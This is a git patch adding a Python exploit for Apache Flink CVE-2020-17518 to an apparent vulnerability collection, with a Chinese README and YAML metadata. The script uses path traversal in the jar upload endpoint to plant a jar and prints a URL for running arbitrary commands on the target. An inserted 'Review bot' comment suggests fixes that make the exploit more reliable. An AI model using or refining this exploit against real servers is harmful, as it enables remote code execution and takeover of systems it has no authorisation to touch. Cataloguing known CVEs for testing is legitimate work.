From f03ad6df9bcfc8dc27433fac7a010ca156ff802b Mon Sep 17 00:00:00 2001
From: me-zz
Date: Wed, 15 Mar 2023 03:14:55 -0700
Subject: [PATCH] add CVE-2020-17518

---
 .../2020/CVE-2020-17518/CVE-2020-17518.py | 30 +++++++++++++++++++
 .../2020/CVE-2020-17518/README.md | 10 +++++++
 .../2020/yaml/CVE-2020-17518.yaml | 19 ++++++++++++
 openkylin_list.yaml | 4 ++-
 4 files changed, 62 insertions(+), 1 deletion(-)
 create mode 100755 cve/apache-Flink/2020/CVE-2020-17518/CVE-2020-17518.py
 create mode 100644 cve/apache-Flink/2020/CVE-2020-17518/README.md
 create mode 100644 cve/apache-Flink/2020/yaml/CVE-2020-17518.yaml

diff --git a/cve/apache-Flink/2020/CVE-2020-17518/CVE-2020-17518.py b/cve/apache-Flink/2020/CVE-2020-17518/CVE-2020-17518.py
new file mode 100755
index 00000000..c78850f5
--- /dev/null
+++ b/cve/apache-Flink/2020/CVE-2020-17518/CVE-2020-17518.py
@@ -0,0 +1,30 @@
+import requests
+import base64
+import json
+import sys
+import cStringIO
+#jar_code="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"
+def main():
+    if len(sys.argv) == 1 or sys.argv[1] == '-h':
+        print('Usage :python2 flink-getshell.py http://example.com:8081')
+        exit()
+    url = sys.argv[1]
+    jobmanager_config_dir = url + '/jobmanager/config'
+    upload_jar_url = url + "/jars/upload"
+    r1 = requests.get(jobmanager_config_dir,verify=False)
+    #data = json.loads(req.text)[2]['value']
+    data = json.loads(r1.text)
+    for i in data:
+        #print(i['key'])
+        if i['key'] == "web.tmpdir":
+            flink_webdir = i['value']
+    print("webdir:%s" % flink_webdir)
+    file_content = base64.b64decode('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')
+    files = {'jarfile': ('../../../../../..%s/flink-web-upload/new1.jar' % flink_webdir, cStringIO.StringIO(file_content), 'application/octet-stream')}
+    r2 = requests.post(upload_jar_url, files=files, timeout=30, verify=False)
+    print('the shell:%s/jars/new1.jar/run?entry-class=Execute&program-args="command"' % url)
+
+if __name__ == "__main__":
+    main()
+
+
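Review bot: `flink_webdir` is only bound inside the `for i in data` loop when a `web.tmpdir` entry is present, so a target whose `/jobmanager/config` response lacks that key (or is not JSON at all, e.g. an error page) kills the script with a NameError or ValueError instead of a usable message, and `r2` is never inspected, so the `the shell:` line is printed even when the upload was rejected. I would resolve the directory with a guarded lookup and check the upload's HTTP status before announcing the shell URL, as below. Two smaller points on how the script is written: it runs only under Python 2 (`cStringIO`, and the usage text says `python2`) yet is committed as `CVE-2020-17518.py` while the usage line names `flink-getshell.py`, so `io.BytesIO` plus a usage string that matches the filename would avoid confusion; and `verify=False` together with the fixed `new1.jar` name deserve a one-line comment that TLS verification is deliberately disabled and that the uploaded jar is left behind on the target. The embedded jar payload is redacted in this view, so its contents could not be reviewed.
```python
    data = json.loads(r1.text)
    flink_webdir = next((i['value'] for i in data if i['key'] == "web.tmpdir"), None)
    if flink_webdir is None:
        print("web.tmpdir not found in %s" % jobmanager_config_dir)
        exit()
    # … unchanged: webdir print, payload decode, files dict …
    r2 = requests.post(upload_jar_url, files=files, timeout=30, verify=False)
    if r2.status_code != 200:
        print("upload failed: HTTP %d" % r2.status_code)
        exit()
    print('the shell:%s/jars/new1.jar/run?entry-class=Execute&program-args="command"' % url)
```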
diff --git a/cve/apache-Flink/2020/CVE-2020-17518/README.md b/cve/apache-Flink/2020/CVE-2020-17518/README.md
new file mode 100644
index 00000000..ab9a6351
--- /dev/null
+++ b/cve/apache-Flink/2020/CVE-2020-17518/README.md
@@ -0,0 +1,10 @@
+# Flink-文件上传
+Apache Flink 文件上传
+#Use
+Apache Flink是美国阿帕奇软件(Apache)基金会的一款开源的分布式流数据处理引擎。Apache Flink 1.5.1 引入了一个 REST 处理程序,它允许你通过恶意修改的 HTTP 标头将上传的文件写入本地文件系统上的任意位置。这些文件可以写入 Flink 1.5.1 可访问的任何位置。
+
+# eg
+python flink-getshell.py http://example.com:8081
+
+# reference
+code from: https://github.com/rakjong/Flink-CVE-2020-17518-getshell
diff --git a/cve/apache-Flink/2020/yaml/CVE-2020-17518.yaml b/cve/apache-Flink/2020/yaml/CVE-2020-17518.yaml
new file mode 100644
index 00000000..4fa625d4
--- /dev/null
+++ b/cve/apache-Flink/2020/yaml/CVE-2020-17518.yaml
@@ -0,0 +1,19 @@
+id: CVE-2020-17518
+source: https://github.com/rakjong/Flink-CVE-2020-17518-getshell
+info:
+  name: Apache Flink是一个开源流处理框架,具有强大的流处理和批处理功能。
+  severity: high
+  description:
+    在Apache Flink1.5.1中引入了 REST 处理程序,允许通过恶意修改HTTP HEADER将上传的文件写入本地文件系统上的任意位置。攻击者利用REST API,可以修改HTTP头,将上传的文件写入到本地文件系统上的任意位置。
+  scope-of-influence:
+    Apache Flink 1.5.1-1.11.2
+  reference:
+    - https://nvd.nist.gov/vuln/detail/cve-2020-17518
+    - https://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2020-17518
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2020-17518
+    cnvd-id: None
+    kve-id: None
+  tags: cve2020, Apache, Flink, Upload
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index efffaf70..8e492dd7 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -18,6 +18,8 @@ cve:
     - CVE-2020-1938
   apache-Spark:
     - CVE-2022-33891
+  apache-Flink:
+    - CVE-2020-17518
   apache-tomcat:
     - CVE-2020-13935
   Influx-DB:
@@ -114,4 +116,4 @@ kve:
   kylin-display-switch:
     - KVE-2022-0206
   kylin-activation:
-    - KVE-2022-0231
\ No newline at end of file
+    - KVE-2022-0231